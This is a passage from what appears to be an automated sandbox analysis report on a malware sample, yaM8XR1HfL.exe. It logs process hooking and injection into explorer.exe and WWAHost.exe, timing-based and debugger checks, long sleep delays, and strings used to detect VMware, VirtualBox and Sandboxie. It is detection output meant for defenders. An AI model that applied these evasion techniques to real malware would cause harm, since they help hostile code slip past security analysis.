          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0405225F pushad ; ret 9_2_040527F9
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0405283D push eax; iretd 9_2_04052858
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040809AD push ecx; mov dword ptr [esp], ecx 9_2_040809B6
          Source: yaM8XR1HfL.exe Static PE information: section name: .text entropy: 7.1884613511282724

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe File opened: C:\Users\user\Desktop\yaM8XR1HfL.exe\:Zone.Identifier read attributes | delete
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WWAHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara match File source: Process Memory Space: yaM8XR1HfL.exe PID: 5160, type: MEMORYSTR
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88ED944
          Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88ED504
          Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88ED544
          Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 2F79904 second address: 2F7990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 2F79B7E second address: 2F79B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: E50000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: 2850000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: 4850000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: 7CE0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: 8CE0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: 8EB0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: 9EB0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: A240000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: B240000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: C240000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C096E rdtsc 4_2_014C096E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 809
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 791
          Source: C:\Windows\SysWOW64\WWAHost.exe Window / User API: threadDelayed 9730
          Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API coverage: 0.9 %
          Source: C:\Windows\SysWOW64\WWAHost.exe API coverage: 0.7 %
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe TID: 348 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe TID: 6648 Thread sleep time: -63000s >= -30000s
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe TID: 2764 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4788 Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572 Thread sleep count: 240 > 30
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572 Thread sleep time: -480000s >= -30000s
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572 Thread sleep count: 9730 > 30
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572 Thread sleep time: -19460000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0016B120 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [esi+000000a4h], 03h and CTI: je 00191D18h 9_2_0016B120
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00149760 GetSystemTimeAsFileTime followed by cmp: cmp al, 01h and CTI: jne 00149886h 9_2_00149760
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0017212C memset,FindFirstFileW,FindClose, 9_2_0017212C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000007.00000000.2499817163.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
          Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
          Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
          Source: yaM8XR1HfL.exe, 00000000.00000002.2507059817.00000000053F0000.00000004.08000000.00040000.00000000.sdmp, yaM8XR1HfL.exe, 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VBoxTray
          Source: explorer.exe, 00000007.00000002.3302042587.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
          Source: yaM8XR1HfL.exe, 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
          Source: explorer.exe, 00000007.00000003.2651889553.0000000003554000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
          Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000007.00000003.2651889553.0000000003554000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000007.00000002.3292908189.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
          Source: explorer.exe, 00000007.00000000.2499817163.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
          Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000002.3302042587.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000007.00000003.2651889553.0000000003554000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000007.00000003.2651889553.0000000003554000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
          Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
          Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
          Source: explorer.exe, 00000007.00000002.3292908189.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000007.00000002.3302042587.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.2499817163.000000000769A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\WWAHost.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C096E rdtsc 4_2_014C096E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2B60 NtClose,LdrInitializeThunk, 4_2_014C2B60
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00162802 #797,GetCurrentThread,SetThreadDescription,IsDebuggerPresent,RegOpenKeyExW,GetCurrentProcessId,RegCloseKey,ExitProcess, 9_2_00162802
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0014AA8C GetCurrentThreadId,LoadLibraryW,GetProcAddress, 9_2_0014AA8C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01518158 mov eax, dword ptr fs:[00000030h] 4_2_01518158
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147C156 mov eax, dword ptr fs:[00000030h] 4_2_0147C156
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01514144 mov eax, dword ptr fs:[00000030h] 4_2_01514144
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01514144 mov ecx, dword ptr fs:[00000030h] 4_2_01514144
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486154 mov eax, dword ptr fs:[00000030h] 4_2_01486154
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554164 mov eax, dword ptr fs:[00000030h] 4_2_01554164
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01540115 mov eax, dword ptr fs:[00000030h] 4_2_01540115
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152A118 mov ecx, dword ptr fs:[00000030h] 4_2_0152A118
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152A118 mov eax, dword ptr fs:[00000030h] 4_2_0152A118
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov eax, dword ptr fs:[00000030h] 4_2_0152E10E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov ecx, dword ptr fs:[00000030h] 4_2_0152E10E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B0124 mov eax, dword ptr fs:[00000030h] 4_2_014B0124
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015461C3 mov eax, dword ptr fs:[00000030h] 4_2_015461C3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE1D0 mov eax, dword ptr fs:[00000030h] 4_2_014FE1D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE1D0 mov ecx, dword ptr fs:[00000030h] 4_2_014FE1D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015561E5 mov eax, dword ptr fs:[00000030h] 4_2_015561E5
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B01F8 mov eax, dword ptr fs:[00000030h]4_2_014B01F8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C0185 mov eax, dword ptr fs:[00000030h]4_2_014C0185
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150019F mov eax, dword ptr fs:[00000030h]4_2_0150019F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150019F mov eax, dword ptr fs:[00000030h]4_2_0150019F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150019F mov eax, dword ptr fs:[00000030h]4_2_0150019F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150019F mov eax, dword ptr fs:[00000030h]4_2_0150019F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147A197 mov eax, dword ptr fs:[00000030h]4_2_0147A197
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147A197 mov eax, dword ptr fs:[00000030h]4_2_0147A197
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147A197 mov eax, dword ptr fs:[00000030h]4_2_0147A197
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01524180 mov eax, dword ptr fs:[00000030h]4_2_01524180
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01524180 mov eax, dword ptr fs:[00000030h]4_2_01524180
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0153C188 mov eax, dword ptr fs:[00000030h]4_2_0153C188
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0153C188 mov eax, dword ptr fs:[00000030h]4_2_0153C188
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01506050 mov eax, dword ptr fs:[00000030h]4_2_01506050
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01482050 mov eax, dword ptr fs:[00000030h]4_2_01482050
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AC073 mov eax, dword ptr fs:[00000030h]4_2_014AC073
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01504000 mov ecx, dword ptr fs:[00000030h]4_2_01504000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01522000 mov eax, dword ptr fs:[00000030h]4_2_01522000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01522000 mov eax, dword ptr fs:[00000030h]4_2_01522000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01522000 mov eax, dword ptr fs:[00000030h]4_2_01522000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01522000 mov eax, dword ptr fs:[00000030h]4_2_01522000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01522000 mov eax, dword ptr fs:[00000030h]4_2_01522000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01522000 mov eax, dword ptr fs:[00000030h]4_2_01522000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01522000 mov eax, dword ptr fs:[00000030h]4_2_01522000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01522000 mov eax, dword ptr fs:[00000030h]4_2_01522000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149E016 mov eax, dword ptr fs:[00000030h]4_2_0149E016
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149E016 mov eax, dword ptr fs:[00000030h]4_2_0149E016
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149E016 mov eax, dword ptr fs:[00000030h]4_2_0149E016
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149E016 mov eax, dword ptr fs:[00000030h]4_2_0149E016
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01516030 mov eax, dword ptr fs:[00000030h]4_2_01516030
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147A020 mov eax, dword ptr fs:[00000030h]4_2_0147A020
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147C020 mov eax, dword ptr fs:[00000030h]4_2_0147C020
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015020DE mov eax, dword ptr fs:[00000030h]4_2_015020DE
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014880E9 mov eax, dword ptr fs:[00000030h]4_2_014880E9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0147A0E3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015060E0 mov eax, dword ptr fs:[00000030h]4_2_015060E0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147C0F0 mov eax, dword ptr fs:[00000030h]4_2_0147C0F0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C20F0 mov ecx, dword ptr fs:[00000030h]4_2_014C20F0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148208A mov eax, dword ptr fs:[00000030h]4_2_0148208A
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014780A0 mov eax, dword ptr fs:[00000030h]4_2_014780A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015460B8 mov eax, dword ptr fs:[00000030h]4_2_015460B8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015460B8 mov ecx, dword ptr fs:[00000030h]4_2_015460B8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015180A8 mov eax, dword ptr fs:[00000030h]4_2_015180A8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01528350 mov ecx, dword ptr fs:[00000030h]4_2_01528350
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154A352 mov eax, dword ptr fs:[00000030h]4_2_0154A352
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150035C mov eax, dword ptr fs:[00000030h]4_2_0150035C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150035C mov eax, dword ptr fs:[00000030h]4_2_0150035C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150035C mov eax, dword ptr fs:[00000030h]4_2_0150035C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150035C mov ecx, dword ptr fs:[00000030h]4_2_0150035C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150035C mov eax, dword ptr fs:[00000030h]4_2_0150035C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150035C mov eax, dword ptr fs:[00000030h]4_2_0150035C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01502349 mov eax, dword ptr fs:[00000030h]4_2_01502349
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0155634F mov eax, dword ptr fs:[00000030h]4_2_0155634F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152437C mov eax, dword ptr fs:[00000030h]4_2_0152437C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BA30B mov eax, dword ptr fs:[00000030h]4_2_014BA30B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BA30B mov eax, dword ptr fs:[00000030h]4_2_014BA30B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BA30B mov eax, dword ptr fs:[00000030h]4_2_014BA30B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147C310 mov ecx, dword ptr fs:[00000030h]4_2_0147C310
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A0310 mov ecx, dword ptr fs:[00000030h]4_2_014A0310
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01558324 mov eax, dword ptr fs:[00000030h]4_2_01558324
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01558324 mov ecx, dword ptr fs:[00000030h]4_2_01558324
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01558324 mov eax, dword ptr fs:[00000030h]4_2_01558324
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01558324 mov eax, dword ptr fs:[00000030h]4_2_01558324
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015243D4 mov eax, dword ptr fs:[00000030h]4_2_015243D4
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015243D4 mov eax, dword ptr fs:[00000030h]4_2_015243D4
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h]4_2_0148A3C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h]4_2_0148A3C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h]4_2_0148A3C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h]4_2_0148A3C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h]4_2_0148A3C0
